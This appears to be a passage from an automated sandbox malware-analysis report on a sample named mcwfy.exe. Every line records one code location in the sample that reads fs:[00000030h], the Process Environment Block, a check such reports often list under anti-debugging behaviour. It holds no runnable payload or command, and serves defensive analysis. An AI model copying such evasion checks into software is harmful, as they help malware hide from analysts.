          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h]
